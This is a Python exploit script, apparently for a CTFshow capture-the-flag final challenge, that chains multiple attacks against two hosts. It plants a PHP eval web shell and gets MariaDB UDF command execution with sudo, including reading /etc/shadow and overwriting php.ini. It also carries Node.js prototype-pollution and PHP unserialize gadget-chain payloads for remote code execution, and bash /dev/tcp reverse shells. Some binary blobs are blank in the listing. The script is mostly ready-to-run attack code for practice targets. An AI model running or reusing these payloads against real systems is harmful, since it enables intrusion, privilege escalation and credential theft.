CTFshow_终极考核_EXP

EXP ALL IN HERE

exp exp exp ヾ(・ω・`。)

import requests
import base64
import re
import time


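def getShell(url: str, *, timeout: float = 60) -> str:
    """Stage 1: plant the ``1.php`` web shell on the first host and return its subnet id.

    Two requests go to the ``system36d`` back end of the first host:

    1. A multipart upload of ``backup.dat`` to ``users.php?action=upload``. The body is a
       pipe-separated user list whose ``admin`` entry carries the challenge key
       (``flag_645=...``). What the server does with the file is not visible from here;
       presumably it is the import that unlocks the next endpoint (TODO confirm).
    2. A POST to ``util/common.php`` (gated by ``k=flag_651=...`` in the URL and
       ``key=key_is_here_you_know`` in the body) whose field ``1`` is PHP source that the
       endpoint evaluates. That PHP drops ``udf.so`` into the MariaDB plugin directory,
       writes ``1.php`` into the web root (the base64 decodes to ``<?=eval($_POST[1])?>``)
       and runs ``ip addr`` so the host's private address can be scraped from the output.

    NOTE(review): ``hex2bin('')`` is empty - the UDF shared object was stripped from this
    listing, so ``udf.so`` is written as a zero-byte file and ``CREATE FUNCTION sys_eval``
    (see ``restartPHP``) cannot succeed until that hex blob is restored.

    The challenge keys, the ``Referer`` values and the ``UM_distinctid`` cookie were copied
    from the author's Burp sessions; the two ``Referer`` hosts do not even match ``url`` and
    nothing visible here depends on them.

    Args:
        url: Base URL of the first host, with a trailing slash.
        timeout: Per-request timeout in seconds. The original had none, so a stalled target
            hung the whole run.

    Returns:
        The third octet ``X`` of the host's ``172.2.X.4/24`` address, as a string. Every later
        stage uses it to reach the second host at ``172.2.X.5``.

    Raises:
        RuntimeError: if no ``172.2.X.4/24`` address is in the response. The original returned
            ``None`` here (or raised ``IndexError``), and the callers then silently built
            ``http://172.2.None.5/...`` URLs.
    """
    upload_url = url + "system36d/users.php?action=upload"
    upload_headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary1qlfRm0gVIoKhBvA",
    }
    # Raw multipart body; the boundary must match the Content-Type header above.
    upload_body = "\r\n------WebKitFormBoundary1qlfRm0gVIoKhBvA\r\nContent-Disposition: form-data; name=\"file\"; filename=\"backup.dat\"\r\nContent-Type: application/octet-stream\r\n\r\na113@bbb123|a114@bbb1234|admin@flag_645=ctfshow{28b00f799c2e059bafaa1d6bda138d89}|a2@bbb123|\r\n------WebKitFormBoundary1qlfRm0gVIoKhBvA--\r\n\r\n"
    res = requests.post(url=upload_url, headers=upload_headers, data=upload_body, timeout=timeout)
    print(res.text)

    rce_url = url + "system36d/util/common.php?k=flag_651=ctfshow{a4c64b86d754b3b132a138e3e0adcaa6}"
    rce_cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    rce_headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": "http://c1be7167-28a0-4504-a5cd-04ca07fe2de6.challenge.ctf.show/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # "file" points the endpoint at its own DB via path traversal; "1" is the PHP it evaluates.
    # hex2bin('') is the stripped udf.so blob (see the docstring).
    rce_data = {
        "key": "key_is_here_you_know",
        "file": "../db/data_you_never_know.db",
        "1": "file_put_contents('udf.txt',hex2bin(''));echo shell_exec('cp udf.txt /usr/lib/mariadb/plugin/udf.so');echo shell_exec(\"echo PD89ZXZhbCgkX1BPU1RbMV0pPz4=|base64 -d>/var/www/html/1.php\");echo shell_exec('ip addr');",
    }
    res = requests.post(rce_url, headers=rce_headers, cookies=rce_cookies, data=rce_data, timeout=timeout)
    print(res.text)

    # `ip addr` lists the first host as 172.2.X.4/24; X identifies this instance's subnet.
    match = re.search(r'172\.2\.([0-9]*)\.4\/24', res.text)
    if match is None:
        raise RuntimeError("getShell: no 172.2.X.4/24 address in the response - the common.php RCE did not run `ip addr`")
    net_id = match.group(1)
    print([net_id])
    return net_id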

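def runPython(url: str, payload: str, *, timeout: float = 60) -> None:
    """Run a Python 3 snippet on the first host through the ``1.php`` web shell.

    ``1.php`` evaluates ``$_POST[1]`` as PHP. The PHP sent here is
    ``echo `python3 -c "<payload>"`;`` - backticks are PHP's shell-execution operator, so the
    snippet runs as the web server user and its stdout is echoed back and printed.

    The snippet is pasted into a double-quoted shell string unescaped: it must not contain
    ``"``, backticks or ``$`` (the snippet in ``__main__`` only uses single quotes).

    Args:
        url: Base URL of the first host (trailing slash), where ``getShell`` planted ``1.php``.
        payload: Python source to execute on the target.
        timeout: Request timeout in seconds (new; the original had none).
    """
    shell_url = url + "1.php"
    # Analytics cookie copied from the browser session; nothing visible here needs it.
    cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    php = f"echo `python3 -c \"{payload}\"`;"
    res = requests.post(shell_url, headers=headers, cookies=cookies, data={"1": php}, timeout=timeout)
    print(res.text)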

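def runPHPshell_first(url: str, payload: bytes, *, timeout: float = 60) -> None:
    """Run base64-encoded PHP on the first host through the ``1.php`` web shell.

    The field sent is ``eval(base64_decode(<payload>));``. ``payload`` is the *bytes* object
    returned by ``base64.b64encode``, and it is interpolated with its Python repr, so the PHP
    actually reads ``base64_decode(b'...')``. That only parses because PHP accepts a ``b``
    prefix on string literals; passing a ``str`` here would produce unquoted PHP and a syntax
    error on the target.

    Args:
        url: Base URL of the first host (trailing slash).
        payload: ``base64.b64encode(php_source.encode())`` of the PHP to run; output is printed.
        timeout: Request timeout in seconds (new; the original had none).
    """
    shell_url = url + "1.php"
    # Analytics cookie copied from the browser session; nothing visible here needs it.
    cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    php = f"eval(base64_decode({payload}));"
    res = requests.post(shell_url, headers=headers, cookies=cookies, data={"1": php}, timeout=timeout)
    print(res.text)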

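def runMysql_root_first(url: str, sql_payload: str, *, timeout: float = 60) -> None:
    """Run one SQL statement as MariaDB ``root`` on the first host and print the rows.

    The statement is wrapped in a small PHP program (a ``query()`` helper around ``mysqli``)
    and sent to the ``1.php`` web shell as field ``1``. The PHP connects to
    ``localhost`` with the hard-coded ``root``/``root`` credentials to database ``ctfshow``,
    fetches every row as a numeric array and ``print_r``s the result; on a query error it
    echoes ``$conn->error``.

    Templating details worth knowing before editing the PHP:

    * The template is a ``str.format`` template, so every literal PHP brace is doubled
      (``{{`` / ``}}``) and the single ``{}`` is where ``sql_payload`` lands.
    * ``sql_payload`` is spliced into a PHP *double-quoted* string unescaped. A statement
      containing ``"``, ``\\`` or ``$`` would break or be interpolated by PHP; the statements
      used in this script only contain single quotes.
    * The ``sys_eval`` UDF used by the callers is created by ``restartPHP``; it needs the
      ``udf.so`` that ``getShell`` uploads (blank in this listing).

    Args:
        url: Base URL of the first host (trailing slash).
        sql_payload: SQL to execute, e.g. ``select sys_eval('id')``.
        timeout: Request timeout in seconds (new; the original had none).
    """
    php_source = r"""
    function query($sql){{
    $host='localhost';
    $username='root';
    $password='root';
    $database='ctfshow';

    $ret = array();

    $conn = new mysqli($host, $username, $password, $database);

    if ($conn->connect_error) {{
    die("连接失败: " . $conn->connect_error);
    }}

    $res = $conn->query($sql);
    if($res){{
        while ($row = $res->fetch_array(MYSQLI_NUM)) {{
            array_push($ret,$row);
        }}
        $res->close();
    }}
    else{{
    echo $conn->error;
    }}

    $conn->close();
    return $ret;
    }}

    $ret=query("{}");
    print_r(($ret));
    """.format(sql_payload)

    shell_url = url + "1.php"
    # Analytics cookie copied from the browser session; nothing visible here needs it.
    cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    res = requests.post(shell_url, headers=headers, cookies=cookies, data={"1": php_source}, timeout=timeout)
    print(res.text)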

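def nodejsShell(url: str, payload: bytes, net_id: str, *, timeout: float = 60) -> None:
    """Second host, port 3000: prototype pollution through the JSON ``/login`` body.

    The second host (``172.2.X.5``) is only reachable from the private subnet, so both
    requests are made by ``curl`` running inside ``1.php`` on the first host.

    The login body is ``{"__proto__":{"__proto__":{...}}}``: when the server merges it
    recursively into an object, the inner keys end up on ``Object.prototype``. Those keys
    (``type: "Block"``, ``nodes``, ``compileDebug``, ``self``, ``line``) look like a
    template-engine AST node whose ``line`` value gets spliced into generated JavaScript
    (TODO confirm which engine); ``line`` here is
    ``child_process.exec('bash -c " echo <payload>|base64 -d|bash "')``.
    ``ret_code`` in the response is what the author treats as "login accepted".

    The second request just fetches ``/``. Rendering the page now runs through the polluted
    prototype; the ``title is not defined`` error is taken as proof that the pollution (and
    thus the command) took effect.

    Args:
        url: Base URL of the first host (trailing slash), where ``1.php`` lives.
        payload: ``base64.b64encode(...)`` of the shell command to run on the second host.
        net_id: Third octet X from ``getShell``; the target is ``http://172.2.X.5:3000``.
        timeout: Per-request timeout in seconds (new; the original had none). A command that
            keeps a reverse shell open keeps the HTTP request open as well.
    """
    pollution_json = """
    {"__proto__":{"__proto__": {"type":"Block","nodes":"","compileDebug":1,"self":1,"line":"global.process.mainModule.require('child_process').exec('bash -c \\" echo """ + payload.decode('utf8') + """|base64 -d|bash \\"')"}}}"""
    # Base64 once more so the JSON survives being quoted inside PHP -> shell -> curl.
    pollution_b64 = base64.b64encode(pollution_json.encode()).decode('utf8')

    shell_url = url + "1.php"
    # Analytics cookie copied from the browser session; nothing visible here needs it.
    cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
    }

    login_php = f"echo shell_exec('curl \"http://172.2.{net_id}.5:3000/login\" -X POST -H \"Content-Type: application/json\" -d \"`echo {pollution_b64}|base64 -d`\"');"
    res = requests.post(shell_url, headers=headers, cookies=cookies, data={"1": login_php}, timeout=timeout)
    if "ret_code" in res.text:
        print("The first is Success")
    else:
        print(res.text)

    trigger_php = f"echo shell_exec('curl \"http://172.2.{net_id}.5:3000/\"');"
    res = requests.post(shell_url, headers=headers, cookies=cookies, data={"1": trigger_php}, timeout=timeout)
    if "title is not defined" in res.text:
        print("The Second is Success\n")
    else:
        print(res.text)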

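def runPHP_eval_second(url: str, payload: bytes, net_id: str, *, timeout: float = 60) -> None:
    r"""Second host, port 8888: PHP object injection (``r=site/unserialize``) ending in ``eval``.

    ``1.php`` on the first host runs ``curl`` against
    ``http://172.2.X.5:8888/index.php?r=site/unserialize&key=flag_663=ctfshow{...}`` (an
    ``r=controller/action`` route - Yii-style, presumably) and POSTs
    ``UnserializeForm[ctfshowUnserializeData]=<serialized chain>&2=<$_REQUEST[22]>``.

    URL-decoding the chain shows the gadgets, all from vendored libraries (judging by the
    class and property names):
    ``Codeception\Extension\RunProcess`` (``output``, ``processes``) ->
    ``Faker\DefaultGenerator`` (``default``) ->
    ``GuzzleHttp\Psr7\AppendStream`` -> ``CachingStream`` -> ``PumpStream`` whose ``source``
    is an ``Opis\Closure\SerializableClosure`` wrapping
    ``function(){eval($_REQUEST[2]);die();}``. So whatever arrives as request parameter ``2``
    runs as PHP on the second host - and that value is ``'.$_REQUEST[22].'``, i.e. this
    request's ``22`` field, which is ``eval(base64_decode(<payload>))``.

    The ``\{`` / ``\}`` around the flag in the URL escape the braces from *curl's* URL
    globbing (curl treats ``{a,b}`` as alternation unless ``-g``), not from the shell.

    ``payload`` is interpolated with its bytes repr, so the PHP reads ``base64_decode(b'...')``;
    PHP accepts the ``b`` string prefix, a plain ``str`` would not parse.

    Args:
        url: Base URL of the first host (trailing slash).
        payload: ``base64.b64encode(...)`` of the PHP to run on the second host.
        net_id: Third octet X from ``getShell``.
        timeout: Request timeout in seconds (new; the original had none).

    Side effects: prints the response and saves it to ``./content.html`` via ``save_txt``.
    """
    shell_url = url + "1.php"
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "close",
    }

    # Field "1" is evaluated by 1.php on the first host; it relays field "22" to the second host as "2".
    data = {
        "1": "echo shell_exec('curl \"http://172.2."+net_id+".5:8888/index.php?r=site/unserialize&key=flag_663=ctfshow\\{fa5cc1fb0bfc986d1ef150269c0de197\\}\" -d \"UnserializeForm[ctfshowUnserializeData]=O%3A32%3A%22Codeception%5CExtension%5CRunProcess%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00output%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A5%3A%22jiang%22%3B%7Ds%3A43%3A%22%00Codeception%5CExtension%5CRunProcess%00processes%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3BO%3A28%3A%22GuzzleHttp%5CPsr7%5CAppendStream%22%3A2%3A%7Bs%3A37%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00streams%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22GuzzleHttp%5CPsr7%5CCachingStream%22%3A2%3A%7Bs%3A43%3A%22%00GuzzleHttp%5CPsr7%5CCachingStream%00remoteStream%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bb%3A0%3B%7Ds%3A6%3A%22stream%22%3BO%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3A3%3A%7Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00source%22%3BC%3A32%3A%22Opis%5CClosure%5CSerializableClosure%22%3A192%3A%7Ba%3A5%3A%7Bs%3A3%3A%22use%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22function%22%3Bs%3A37%3A%22function%28%29%7Beval%28%24_REQUEST%5B2%5D%29%3Bdie%28%29%3B%7D%22%3Bs%3A5%3A%22scope%22%3Bs%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3Bs%3A4%3A%22this%22%3BN%3Bs%3A4%3A%22self%22%3Bs%3A32%3A%22000000006cfe4a45000000005bbc4366%22%3B%7D%7Ds%3A32%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00size%22%3Bi%3A-10%3Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00buffer%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A1%3A%22j%22%3B%7D%7D%7D%7Ds%3A38%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00seekable%22%3Bb%3A1%3B%7D%7D%7D%7D&2='.$_REQUEST[22].'%3b\"');",
        "22": f"eval(base64_decode({payload}));",
    }
    res = requests.post(shell_url, headers=headers, data=data, timeout=timeout)
    print(res.text)
    save_txt(res.text)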

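def runPHP_eval_second_bypass(url: str, pwn_shell: bytes, net_id: str, *, timeout: float = 60) -> None:
    r"""Second host, port 8888: same unserialize chain as ``runPHP_eval_second``, but the PHP
    that runs there first (re)builds ``/tmp/newfile.txt`` and ``require_once``s it.

    The file is written in two parts: ``base64_decode(pwn_def_b64)`` followed by
    ``base64_decode(pwn_shell)``. Every ``pwn_shell`` used in ``__main__`` is a call such as
    ``pwn('...')``, and ``pwn()`` is defined nowhere on this page, so the first part is
    presumably the PHP that defines ``pwn()`` - the ``disable_functions`` bypass that lets a
    shell command run despite the php.ini restrictions checked earlier with
    ``grep disable_fun``.

    NOTE(review): that definition was stripped from this listing (``pwn_def_b64`` is empty).
    As written, the second host will fail with an undefined-function error on ``pwn`` until
    the blob is restored; a warning is printed instead of silently sending a broken payload.

    Transport is identical to ``runPHP_eval_second``: ``curl`` inside ``1.php`` on the first
    host posts the gadget chain (RunProcess -> DefaultGenerator -> Guzzle streams ->
    SerializableClosure ``eval($_REQUEST[2])``) to ``172.2.X.5:8888`` and relays this
    request's ``22`` field as parameter ``2``. The ``\{``/``\}`` in the URL keep curl's URL
    globbing from eating the braces of the flag.

    Args:
        url: Base URL of the first host (trailing slash).
        pwn_shell: ``base64.b64encode(...)`` of the PHP statement to append to the helper,
            e.g. ``pwn('id');``.
        net_id: Third octet X from ``getShell``.
        timeout: Request timeout in seconds (new; the original had none). Use a large value
            or ``None`` for reverse-shell payloads, which hold the request open.

    Side effects: prints the response and saves it to ``./content.html`` via ``save_txt``.
    """
    pwn_def_b64 = ""  # base64 of the PHP that defines pwn(); stripped from this listing
    if not pwn_def_b64:
        print("WARNING: pwn_def_b64 is empty - pwn() will be undefined on the target; fill it in first")

    # Build /tmp/newfile.txt = pwn() definition + the caller's pwn(...) call, then include it.
    php_stage = f"""
    $myfile = fopen("/tmp/newfile.txt", "w") or die("Unable to open file!");
    $txt = base64_decode("{pwn_def_b64}");
    fwrite($myfile, $txt);
    fclose($myfile);

    $myfileContent = file_get_contents("/tmp/newfile.txt");
    $txt = base64_decode("{pwn_shell.decode('utf8')}");
    $myfileContent = $myfileContent . $txt;
    file_put_contents("/tmp/newfile.txt", $myfileContent);

    require_once("/tmp/newfile.txt");
    """
    # bytes on purpose: the b'...' repr below is what PHP receives, and PHP accepts the b prefix.
    php_stage_b64 = base64.b64encode(php_stage.encode())

    shell_url = url + "1.php"
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "close",
    }

    data = {
        "1": "echo shell_exec('curl \"http://172.2."+net_id+".5:8888/index.php?r=site/unserialize&key=flag_663=ctfshow\\{fa5cc1fb0bfc986d1ef150269c0de197\\}\" -d \"UnserializeForm[ctfshowUnserializeData]=O%3A32%3A%22Codeception%5CExtension%5CRunProcess%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00output%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A5%3A%22jiang%22%3B%7Ds%3A43%3A%22%00Codeception%5CExtension%5CRunProcess%00processes%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3BO%3A28%3A%22GuzzleHttp%5CPsr7%5CAppendStream%22%3A2%3A%7Bs%3A37%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00streams%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22GuzzleHttp%5CPsr7%5CCachingStream%22%3A2%3A%7Bs%3A43%3A%22%00GuzzleHttp%5CPsr7%5CCachingStream%00remoteStream%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bb%3A0%3B%7Ds%3A6%3A%22stream%22%3BO%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3A3%3A%7Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00source%22%3BC%3A32%3A%22Opis%5CClosure%5CSerializableClosure%22%3A192%3A%7Ba%3A5%3A%7Bs%3A3%3A%22use%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22function%22%3Bs%3A37%3A%22function%28%29%7Beval%28%24_REQUEST%5B2%5D%29%3Bdie%28%29%3B%7D%22%3Bs%3A5%3A%22scope%22%3Bs%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3Bs%3A4%3A%22this%22%3BN%3Bs%3A4%3A%22self%22%3Bs%3A32%3A%22000000006cfe4a45000000005bbc4366%22%3B%7D%7Ds%3A32%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00size%22%3Bi%3A-10%3Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00buffer%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A1%3A%22j%22%3B%7D%7D%7D%7Ds%3A38%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00seekable%22%3Bb%3A1%3B%7D%7D%7D%7D&2='.$_REQUEST[22].'%3b\"');",
        "22": f"eval(base64_decode({php_stage_b64}));",
    }
    res = requests.post(shell_url, headers=headers, data=data, timeout=timeout)
    print(res.text)
    save_txt(res.text)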

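def restartPHP(url: str) -> None:
    """First host: load the ``sys_eval`` UDF as MariaDB root, swap php.ini and restart PHP.

    Every step goes through ``runMysql_root_first`` (PHP -> mysqli as ``root``/``root``), so the
    shell commands run as the MariaDB service user; all of them lean on that user being
    able to ``sudo`` without a password (nothing here supplies one - TODO confirm).

    Steps, in order:
      1. ``CREATE FUNCTION sys_eval ... SONAME 'udf.so'`` - needs the ``udf.so`` that
         ``getShell`` copied into the plugin directory (its hex blob is blank in this
         listing, so this step fails until it is restored).
      2. ``chmod 777`` php.ini so the redirect in step 3 (which runs as the MariaDB user,
         only ``echo`` is under ``sudo``) can write it; alias ``python`` to ``python3``.
      3. Overwrite php.ini with the base64 blob in ``php_ini_b64`` - presumably the author's
         php.ini without ``disable_functions``.
      4. ``kill -9`` the running php-fpm/nginx processes (PIDs 122..128 were read off this
         author's ``ps aux``; they are not stable across instances), then run the base64
         command, which decodes to ``sudo php-fpm |sudo nginx``, and show ``ps aux``.

    NOTE(review): the php.ini blob was stripped from this listing. With it empty, step 3 was
    ``sudo echo |base64 -d > php.ini`` - it truncates php.ini to zero bytes and PHP comes back
    with an empty configuration. The function now refuses to send anything while
    ``php_ini_b64`` is empty.

    Args:
        url: Base URL of the first host (trailing slash).

    Raises:
        ValueError: if ``php_ini_b64`` has not been filled in.
    """
    php_ini_b64 = ""  # base64 of the replacement /usr/local/etc/php/php.ini; fill in before use
    if not php_ini_b64:
        raise ValueError("restartPHP: php_ini_b64 is empty - sending it would truncate php.ini on the target")

    runMysql_root_first(url, """CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';""")

    runMysql_root_first(url, """select sys_eval('sudo chmod 777 /usr/local/etc/php/php.ini;sudo ln -s /usr/bin/python3 /usr/bin/python')""")

    runMysql_root_first(url, f"""select sys_eval('sudo echo {php_ini_b64}|base64 -d > /usr/local/etc/php/php.ini')""")

    # c3VkbyBwaHAtZnBtIHxzdWRvIG5naW54IAo= == "sudo php-fpm |sudo nginx \\n"
    runMysql_root_first(url, """select sys_eval('sudo kill -9 122 123 125 126 127 128; echo c3VkbyBwaHAtZnBtIHxzdWRvIG5naW54IAo=|base64 -d|bash ;ps aux;cat restart;sudo chmod 777 /usr/local/etc/php/php.ini')""")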


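def save_txt(content: str, path: str = './content.html') -> None:
    """Write ``content`` to ``path`` as UTF-8, replacing any previous file.

    The second-host helpers use this to keep the (usually HTML) response around for
    inspection in a browser instead of only printing it.

    Args:
        content: Text to write, typically ``res.text`` of a response.
        path: Destination file. Defaults to ``./content.html`` in the current directory,
            which is what the callers in this script rely on.
    """
    with open(path, 'w', encoding="utf8") as f:
        f.write(content)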

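if __name__ == "__main__":
    # Base URL of this instance's first host. Keep the trailing slash: every helper does url + "path".
    url = "http://6c3a739e-e0be-4634-bb79-de883b7a543a.challenge.ctf.show/"
    # To watch the traffic in Burp, add proxies={'http': "http://127.0.0.1:8080"} to the requests calls.

    # Stage 1: web shell on the first host (172.2.X.4) and the subnet id X.
    net_id = getShell(url)
    if not net_id:
        # getShell() comes back empty when the common.php RCE did not print `ip addr`;
        # every later URL would then be built as http://172.2.None.5/...
        raise SystemExit("getShell() returned no network id - aborting")

    # Reverse shells from the second host are caught on the first host (172.2.X.4), so derive
    # the listener from net_id instead of hard-coding one instance's subnet (the original had
    # 172.2.100.4 and 172.2.150.4 baked into the base64). Start `nc -lvnp 2333` there first.
    rev_shell_cmd = f"bash -i >& /dev/tcp/172.2.{net_id}.4/2333 0>&1"
    rev_shell_b64 = base64.b64encode(rev_shell_cmd.encode()).decode("utf8")

    # ---- first host: recon through 1.php -------------------------------------------------
    pythonPayload = """
import os
print(os.system('cat /var/log/nginx/ctfshow_web_access_log_file_you_never_know.log;ip addr'))
    """
    # runPython(url, payload=pythonPayload)

    # phpPayload = f"echo shell_exec('curl \"http://172.2.{net_id}.5:80/public../tmp/\"');"
    phpPayload = f"echo shell_exec('ps aux;cat /usr/local/etc/php/php.ini|grep disable_fun');"
    runPHPshell_first(url, base64.b64encode(phpPayload.encode()))

    # ---- first host: MariaDB UDF (sys_eval) -> root ----------------------------------------
    # Needs the udf.so blob that getShell() uploads (blank in this listing).
    # restartPHP(url)
    # sql_payload = """CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';"""
    sql_payload = """select sys_eval('sudo cat /etc/shadow')"""
    # runMysql_root_first(url, sql_payload)
    # Other commands used at this stage:
    #   sudo kill -9 122 123 125 126 127 128 ;
    #   /usr/local/etc/php/php.ini
    #   cat /usr/local/etc/php/php.ini|grep disable_fun
    #   sudo cat /etc/shadow

    # ---- second host, port 8888: raw PHP for runPHP_eval_second (bytes, plain PHP) ----------
    # phpPayload = b"""
    # require_once("/tmp/newfile.txt");
    #     """
    # The longer variant that first (re)creates /tmp/newfile.txt is what
    # runPHP_eval_second_bypass() builds from pwn_shell below.
    # runPHP_eval_second(url, base64.b64encode(phpPayload), net_id)

    # ---- second host, port 3000: Node.js prototype pollution -> reverse shell ---------------
    nodejs_shell = f"echo {rev_shell_b64}|base64 -d|bash;cat ./* >>/tmp/11.txt;".encode()
    # nodejsShell(url, base64.b64encode(nodejs_shell), net_id)

    # ---- second host, port 8888: unserialize chain + pwn() bypass ----------------------------
    # pwn() is the disable_functions-bypass helper whose definition is blank in
    # runPHP_eval_second_bypass(); none of these run until it is restored.
    # Variant A: reverse shell back to the listener on the first host.
    pwn_shell_revshell = f"pwn('echo {rev_shell_b64}|base64 -d|bash ');"
    # Variant B: one-shot privesc. /getflag appears to run `cat` through $PATH, so a /tmp/cat
    # that prints /root/you_win is what actually executes (TODO confirm against the binary).
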